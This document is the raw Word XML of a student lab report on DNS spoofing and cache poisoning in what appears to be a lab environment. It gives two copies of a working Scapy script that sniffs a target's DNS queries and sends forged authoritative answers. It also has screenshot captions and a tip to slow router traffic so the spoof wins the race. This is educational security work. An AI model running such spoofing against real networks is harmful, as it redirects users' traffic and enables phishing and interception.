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0709B" w14:textId="1E96CEED" w:rsidR="001C64F8" w:rsidRPr="001C64F8" w:rsidRDefault="001C64F8" w:rsidP="001C64F8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C64F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D2D58" w14:textId="5E0DF8EA" w:rsidR="001C64F8" w:rsidRDefault="001C64F8" w:rsidP="001C64F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>-By Vikramadithya Ivaturi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69375B33" w14:textId="78F3DA73" w:rsidR="006A522C" w:rsidRPr="00250F86" w:rsidRDefault="00A01DE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing the setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD24FB0" w14:textId="1887DFF3" w:rsidR="00A01DE0" w:rsidRPr="00250F86" w:rsidRDefault="00A01DE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250F86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6BFBA" w14:textId="6D26BEEF" w:rsidR="00A01DE0" w:rsidRDefault="006E1CBB" w:rsidP="00D67688">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Local name server will send the request to the attack name server, which will in turn </w:t>
      </w:r>
      <w:r w:rsidR="00D7012B">
        <w:t>send it’s IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F1088" w14:textId="6E24CB49" w:rsidR="00D7012B" w:rsidRDefault="0065259A">
      <w:r w:rsidRPr="0065259A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28780401" wp14:editId="4CA196D8">
            <wp:extent cx="6858000" cy="495554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A22A" w14:textId="33F39EA2" w:rsidR="0065259A" w:rsidRDefault="00D67688" w:rsidP="00D67688">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local nameserver directly querying the official name </w:t>
      </w:r>
      <w:r w:rsidR="003E5A5F">
        <w:t>server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC78AF" w14:textId="200B9170" w:rsidR="00D67688" w:rsidRDefault="00EB116C" w:rsidP="00D67688">
      <w:r w:rsidRPr="00EB116C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18972E85" wp14:editId="27D135D9">
            <wp:extent cx="6858000" cy="4875530"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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33BA" w14:textId="7732E5E1" w:rsidR="00EB116C" w:rsidRDefault="00EB116C" w:rsidP="00D67688"/>
    <w:p w14:paraId="76A9D8E7" w14:textId="47F0FD9D" w:rsidR="00EB116C" w:rsidRDefault="00EB116C" w:rsidP="00EB116C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sending the </w:t>
      </w:r>
      <w:r w:rsidR="003B0241">
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uery directly to the </w:t>
      </w:r>
      <w:r w:rsidR="003B0241">
        <w:t>attacker nameserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E58A4" w14:textId="714A4CE4" w:rsidR="003B0241" w:rsidRDefault="001C64F8" w:rsidP="003B0241">
      <w:r w:rsidRPr="001C64F8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="773B73BB" wp14:editId="19D3E6CF">
            <wp:extent cx="6858000" cy="4890135"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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C1C9" w14:textId="6C723475" w:rsidR="001C64F8" w:rsidRDefault="001C64F8" w:rsidP="003B0241"/>
    <w:p w14:paraId="7453595F" w14:textId="3C988EDE" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="003B0241"/>
    <w:p w14:paraId="43ADB024" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="003B0241"/>
    <w:p w14:paraId="1623A90B" w14:textId="1CB20670" w:rsidR="00732559" w:rsidRDefault="00732559" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task-1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ADC1A6" w14:textId="7B035BE0" w:rsidR="00732559" w:rsidRPr="001B1067" w:rsidRDefault="00732559" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1067">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F096FE" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD80B0" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EC7C9" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6360EE" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="258A6E6B" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>target = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABABE2F" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="791EFD91" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F2A47B" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CBF73" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="27698488" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E2283" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374EAB8B" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="6017D6ED" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D1D5D" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C3567" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="3B19883C" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    # The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C3B24" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5A9A5" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">                 ttl=259200, rdata='1.1.1.1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A096B" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="0D18059F" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    # Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C5DA1" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C0E486" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=0, arcount=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0BA60B" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">                 an=Anssec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDEB22" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="1C6249DA" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    # Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7E327" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691F011" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t xml:space="preserve">    send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B365B1" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="2850F389" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t># Sniff UDP query packets and invoke spoof_dns().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B9ADC" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>f = 'udp and (src host {} and dst port 53)'.format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE899FC" w14:textId="794B3894" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067">
      <w:r>
        <w:t>pkt = sniff(iface='br-ed9341677666', filter=f, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C68E5C" w14:textId="77777777" w:rsidR="001B1067" w:rsidRDefault="001B1067" w:rsidP="001B1067"/>
    <w:p w14:paraId="2D409E80" w14:textId="371DE2DE" w:rsidR="00732559" w:rsidRPr="001B1067" w:rsidRDefault="00FA6B35" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1067">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10953A24" w14:textId="00CB3BA5" w:rsidR="00FA6B35" w:rsidRDefault="00FA6B35" w:rsidP="003B0241">
      <w:r>
        <w:t>First we flush the cache in the local DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBDF6B" w14:textId="5AF5E385" w:rsidR="00FA6B35" w:rsidRDefault="00FA6B35" w:rsidP="003B0241">
      <w:r w:rsidRPr="00FA6B35">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CBF28F1" wp14:editId="3C927DEE">
            <wp:extent cx="3168813" cy="895396"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 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5590" w14:textId="18EBCB47" w:rsidR="00FA6B35" w:rsidRDefault="00C569E3" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, running the program in the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E23331" w14:textId="212FC7CE" w:rsidR="00C569E3" w:rsidRDefault="00120541" w:rsidP="003B0241">
      <w:r w:rsidRPr="00120541">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7458521B" wp14:editId="7A72CD02">
            <wp:extent cx="2634070" cy="679688"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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 rotWithShape="1">
                    <a:blip r:embed="rId9"/>
                    <a:srcRect t="1141" b="19536"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2635385" cy="680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0E9E6" w14:textId="46EB2910" w:rsidR="00120541" w:rsidRDefault="00120541" w:rsidP="003B0241">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Trying to find out the </w:t>
      </w:r>
      <w:r w:rsidR="0009451E">
        <w:t>IP address of ‘www.example.com’ from the user machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46932C72" w14:textId="01EC03F9" w:rsidR="0009451E" w:rsidRDefault="002D4878" w:rsidP="003B0241">
      <w:r w:rsidRPr="002D4878">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFE08D7" wp14:editId="3BD1FD37">
            <wp:extent cx="6858000" cy="4511675"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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0FFE" w14:textId="6ABFE3BE" w:rsidR="002D4878" w:rsidRDefault="002D4878" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">We can clearly see the attacker program working. It has sent a packet </w:t>
      </w:r>
      <w:r w:rsidR="00C66463">
        <w:t>mapping the URL to a fake IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90E2AA" w14:textId="046649CF" w:rsidR="000E45E5" w:rsidRDefault="000E45E5" w:rsidP="003B0241">
      <w:r>
        <w:t>Output on the attacker’s side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC5FD0" w14:textId="3114DFD2" w:rsidR="00C66463" w:rsidRDefault="000E45E5" w:rsidP="003B0241">
      <w:r w:rsidRPr="000E45E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DB4566" wp14:editId="5F01FFD1">
            <wp:extent cx="2787793" cy="1339919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B4382" w14:textId="0E44C230" w:rsidR="00120541" w:rsidRDefault="00120541" w:rsidP="003B0241"/>
    <w:p w14:paraId="7EDA5C83" w14:textId="51795860" w:rsidR="0008590A" w:rsidRPr="00753461" w:rsidRDefault="0008590A" w:rsidP="003B0241">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37403251" w14:textId="71E97DCF" w:rsidR="0008590A" w:rsidRDefault="00753461" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213AD42" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EAABF2" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D33D20" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCE924" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="0FE8CEDE" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>target = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7154C461" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="5BFEC41C" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B63E36" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">  if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D87DF" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="3BD218DB" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06104ECC" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB954B" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="638B2607" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    # Swap the source and destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EB4D4" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC247F" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="3301032A" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    # The Answer Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E332BB" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E0CEB" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">                 ttl=259200, rdata='1.1.1.1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE27D2B" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="61E8C6BE" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    # Construct the DNS packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D44FC" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC48D9" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">                 qdcount=1, ancount=1, nscount=0, arcount=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B36360" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">                 an=Anssec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF86311" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="05FD737F" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    # Construct the entire IP packet and send it out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67448D53" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    spoofpkt = IPpkt/UDPpkt/DNSpkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEA037" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t xml:space="preserve">    send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C852983" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525"/>
    <w:p w14:paraId="3B963DAA" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t># Sniff UDP query packets and invoke spoof_dns().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C64D0" w14:textId="19E6BD4B" w:rsidR="00753461" w:rsidRDefault="00954525" w:rsidP="00954525">
      <w:r>
        <w:t>f = 'udp and (src host {} and dst port 53)'.format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8941A" w14:textId="4A404501" w:rsidR="001A5C85" w:rsidRPr="00753461" w:rsidRDefault="001A5C85" w:rsidP="00954525">
      <w:r w:rsidRPr="001A5C85">
        <w:t>pkt = sniff(iface='br-ed9341677666', filter=f, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBAFAB" w14:textId="77777777" w:rsidR="00954525" w:rsidRDefault="00954525" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DDAC60" w14:textId="581EEF4A" w:rsidR="00753461" w:rsidRDefault="00753461" w:rsidP="003B0241">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CEBE41" w14:textId="222D21DE" w:rsidR="00954525" w:rsidRDefault="001A5C85" w:rsidP="003B0241">
      <w:r>
        <w:t>First, wee flush the DNS cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387916C5" w14:textId="0478AC68" w:rsidR="001A5C85" w:rsidRDefault="00B1489D" w:rsidP="003B0241">
      <w:r w:rsidRPr="00B1489D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3D25DB" wp14:editId="6AE23E30">
            <wp:extent cx="3168813" cy="863644"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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3208" w14:textId="57565563" w:rsidR="00311E96" w:rsidRDefault="00311E96" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, we run the program on the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26168E7C" w14:textId="4621C168" w:rsidR="00311E96" w:rsidRDefault="00D71113" w:rsidP="003B0241">
      <w:r w:rsidRPr="00D71113">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180582F5" wp14:editId="267DB21E">
            <wp:extent cx="2724290" cy="711237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 1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B3BA" w14:textId="2E4A83D4" w:rsidR="00B1489D" w:rsidRDefault="00B1489D" w:rsidP="003B0241">
      <w:r>
        <w:t>Now, we run the dig command form the user machine</w:t>
      </w:r>
      <w:r w:rsidR="00311E96">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0AE47" w14:textId="0491290E" w:rsidR="00311E96" w:rsidRDefault="00BA5ED9" w:rsidP="003B0241">
      <w:r w:rsidRPr="00BA5ED9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D31EE9" wp14:editId="10AAD3EF">
            <wp:extent cx="6858000" cy="4910455"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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BE86" w14:textId="1FA16CB3" w:rsidR="00BA5ED9" w:rsidRDefault="00BA5ED9" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">We can see in the above </w:t>
      </w:r>
      <w:r w:rsidR="0036502B">
        <w:t>screenshot that we have received the original IP address of the web address</w:t>
      </w:r>
      <w:r w:rsidR="003005D7">
        <w:t>, even when a packet has been sent from the attacker machine as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3DEE7" w14:textId="2FC109D1" w:rsidR="003005D7" w:rsidRDefault="003005D7" w:rsidP="003B0241">
      <w:r w:rsidRPr="003005D7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB624EE" wp14:editId="32B39DFF">
            <wp:extent cx="2635385" cy="1054154"/>
            <wp:effectExtent l="0" t="0" r="0" b="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971C" w14:textId="111E94F9" w:rsidR="00B84D8C" w:rsidRDefault="00B84D8C" w:rsidP="003B0241">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now, when we dump the DNS cache into a file and verify any entries of ‘example.com’, we get the below output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45D904" w14:textId="1D72D3A4" w:rsidR="00B84D8C" w:rsidRDefault="00B84D8C" w:rsidP="003B0241">
      <w:r w:rsidRPr="00B84D8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="592DF8C4" wp14:editId="363397E5">
            <wp:extent cx="6858000" cy="1988185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 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et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6A06" w14:textId="2AAE0D16" w:rsidR="003005D7" w:rsidRDefault="003005D7" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">This might be the </w:t>
      </w:r>
      <w:r w:rsidR="00B84D8C">
        <w:t xml:space="preserve">case where the </w:t>
      </w:r>
      <w:r w:rsidR="00EC53A8">
        <w:t xml:space="preserve">query of the local DNS server is getting the reply from the original </w:t>
      </w:r>
      <w:r w:rsidR="00BE1C0B">
        <w:t>DNS servers faster than the attacker machine’s spoofed packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238CA60" w14:textId="64468DFA" w:rsidR="00BE1C0B" w:rsidRDefault="00BE1C0B" w:rsidP="003B0241">
      <w:r>
        <w:t xml:space="preserve">This can be resolved by reducing the speed of traffic </w:t>
      </w:r>
      <w:r w:rsidR="0048283D">
        <w:t>from the router (as mentioned in the lab document).</w:t>
      </w:r>
    </w:p>
